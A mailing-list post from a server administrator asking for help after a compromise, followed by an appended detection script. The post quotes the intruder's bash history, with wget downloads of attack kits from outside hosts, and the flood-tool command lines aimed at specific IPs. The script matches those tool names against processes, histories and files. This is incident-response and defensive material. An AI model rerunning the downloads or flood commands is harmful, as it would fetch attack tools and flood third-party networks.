Hello, this weekend it looks like a RaQ 550 of mine was hacked. I tracked some processes that were flooding. The program was called vadimII.
It was run under the name of a user that had SSH access. When I blocked this user, it started a day later under another user. These two users are from different sites on the same machine, but both users belong to the same person. Tracking the IPs, I ended up in Washington, but the user is Dutch, so it looks like someone hacked his computer to retrieve his passwords? Is there a way to check whether the RaQ is infected, or will blocking this user's SSH access be enough? The program that was running was in the /home/tmp directory, in the folder flood; a listing is below. The file broadcast.txt has 2102 IPs in it. I have also saved the bash history of the two users. Several programs were downloaded to my server. I have shortened the bash history to the programs that were downloaded, below this mail. Please advise.

----------
-rwxr-xr-x 1 xxx users 22446 Feb  9  2001 alpha
-rwxr-xr-x 1 xxx users 23521 Aug 17  2000 bloop
-rw-r--r-- 1 xxx users 31909 Aug 22  2001 broadcast.txt
-rwxr-xr-x 1 xxx users 26981 May  9 01:10 cw
-rwxr-xr-x 1 xxx users  2250 Apr 11  2001 da.sh
-rwxr-xr-x 1 xxx users 24747 Mar 10  1996 juno
-rwxr-xr-x 1 xxx users 25285 Aug 17  2000 nestea
-rwxr-xr-x 1 xxx users 24577 Oct  3  2000 overdrop
-rwxr-xr-x 1 xxx users 22803 Oct 17  2000 rc8
-rwxr-xr-x 1 xxx users 28910 Sep  7  2000 s
-rwxr-xr-x 1 xxx users 24786 Mar 10  1996 sl
-rwxr-xr-x 1 xxx users 17027 Feb  9  2001 sl2
-rwxr-xr-x 1 xxx users 17027 Mar  2  2001 sl3
-rwxr-xr-x 1 xxx users 17027 Aug 22  2001 slice2
-rwxr-xr-x 1 xxx users 14883 May 13  2001 slice3
-rwxr-xr-x 1 xxx users 33962 Oct 17  2000 smack
-rwxr-xr-x 1 xxx users 31558 Feb 18  2001 smurf5
-rwxr-xr-x 1 xxx users 39382 Sep  7  2001 smurf6
-rw-r--r-- 1 xxx users 19008 Aug 22  2001 smurf6-linux+LPG.c
-rwxr-xr-x 1 xxx users 22158 Aug  6  2000 stealth
-rwxr-xr-x 1 xxx users 15087 May 13  2001 stream
-rwxr-xr-x 1 xxx users 15151 May 13  2001 stream2
-rwxr-xr-x 1 xxx users 23011 Jul 10 00:07 super
-rwxr-xr-x 1 xxx users 23671 May 13  2001 synhose
-rwxr-xr-x 1 xxx users 26449 Feb  7  1996 synk
-rwxr-xr-x 1 xxx users 15687 May 13  2001 synk7
-rwxr-xr-x 1 xxx users 16519 May 13  2001 synsend
-rwxr-xr-x 1 xxx users 23587 May 13  2001 trash
-rwxr-xr-x 1 xxx users 26252 May 13  2001 trash2
-rwxr-xr-x 1 xxx users 22741 Nov  8  2000 udp
-rwxr-xr-x 1 xxx users 22446 Aug 22  2001 vadimI
-rwxr-xr-x 1 xxx users  2635 Aug 22  2001 vadimI.c
-rwxr-xr-x 1 xxx users 23414 Jun 25 21:52 vadimII
-rwxr-xr-x 1 xxx users 13607 May 13  2001 xdestroy
-rwxr-xr-x 1 xxx users 15119 May 13  2001 xshock

----- bash history
wget www.ps-lov.us/pizda.tgz
wget snow.prohosting.com/muiemuie/p.tar.gz
wget snow.prohosting.com/muiemuie/p.tgz
wget snow.prohosting.com/muiemuie/km3.tgz
wget 65.113.119.133/muiemuie/km3.tgz

It runs programs like:
./super 69.65.48.23 53 nasa.gov
./vadimII 210.0.204.185 53 100000000000000000000000000000000000000 0
./cw 210.0.204.185
./stealth 210.0.204.185 6500000000000
./super 64.207.19.6 53 nasa.gov

_______________________________________________
cobalt-security mailing list
[EMAIL PROTECTED]
http://list.cobalt.com/mailman/listinfo/cobalt-security
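An added triage example, not part of the original post or of anything the poster ran: a small POSIX shell script that turns the three clues in the mail (the running flood processes, the wget lines in the users' bash histories, and the tool names in /home/tmp/flood) into repeatable checks that can be run against every account on the box, not only the two that were blocked. The tool names are taken from the listing above; the process listing, history files and directory tree are constructed sample data so the script runs offline, and the hostnames and PIDs in it are made up for that purpose.

```shell
#!/bin/sh
# Added example, not from the original post. Tool names below are the
# executables from the poster's /home/tmp/flood listing; everything else
# (paths, PIDs, history contents) is constructed sample data.

FLOOD_TOOLS="alpha bloop cw da.sh juno nestea overdrop rc8 s sl sl2 sl3 slice2 slice3 smack smurf5 smurf6 stealth stream stream2 super synhose synk synk7 synsend trash trash2 udp vadimI vadimII xdestroy xshock"

# Print "PID USER TOOL" for every process whose command basename is one of
# the known flood tools. $1 is a file holding ps-style "pid user args" lines.
# On a live box feed it:  ps -eo pid,user,args --no-headers > /tmp/ps.txt
find_flood_procs() {
    awk -v tools="$FLOOD_TOOLS" '
    BEGIN { n = split(tools, t, " "); for (i = 1; i <= n; i++) known[t[i]] = 1 }
    {
        cmd = $3; sub(/.*\//, "", cmd)      # ./vadimII -> vadimII
        if (cmd in known) print $1, $2, cmd
    }' "$1"
}

# Print "USER: COMMAND" for every download command found in any
# .bash_history under the home root $1, so a third account that was used
# the same way shows up too, not just the two already noticed.
find_wget_downloads() {
    find "$1" -name '.bash_history' -type f 2>/dev/null | while read -r hist; do
        user=$(basename "$(dirname "$hist")")
        grep -E '^(wget|curl|ftp|lynx) ' "$hist" | sed "s|^|$user: |"
    done
}

# Print the path of every regular file in directory $1 whose name matches
# a known flood tool (sources such as vadimI.c are deliberately not matched).
find_flood_files() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        base=$(basename "$f")
        for t in $FLOOD_TOOLS; do
            [ "$base" = "$t" ] && echo "$f"
        done
    done
}

# --- constructed sample data (not real output from the compromised RaQ) ---
WORK=$(mktemp -d)
mkdir -p "$WORK/home/alice" "$WORK/home/bob" "$WORK/home/tmp/flood"
printf 'wget snow.prohosting.com/muiemuie/km3.tgz\ncd /home/tmp/flood\n./vadimII 210.0.204.185 53 100 0\n' \
    > "$WORK/home/alice/.bash_history"
printf 'ls\nwget www.ps-lov.us/pizda.tgz\n' > "$WORK/home/bob/.bash_history"
for t in vadimII super cw stealth; do : > "$WORK/home/tmp/flood/$t"; done
: > "$WORK/home/tmp/flood/broadcast.txt"
cat > "$WORK/ps.txt" <<'EOF'
1 root /sbin/init
812 alice ./vadimII 210.0.204.185 53 100000000000000000000000000000000000000 0
815 alice ./super 69.65.48.23 53 nasa.gov
900 bob /usr/sbin/httpd
EOF

echo "== processes matching known flood tools =="
find_flood_procs "$WORK/ps.txt"
echo "== download commands in user histories =="
find_wget_downloads "$WORK/home"
echo "== flood tools on disk =="
find_flood_files "$WORK/home/tmp/flood"
```

On the real machine, run the three functions with a fresh ps listing, /home, and /home/tmp/flood. A match under an account other than the two already blocked means the attacker has more than one set of credentials; and because the tools were fetched with a stolen SSH password rather than a root exploit, also check cron and at jobs for those users before concluding that an SSH block is enough.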
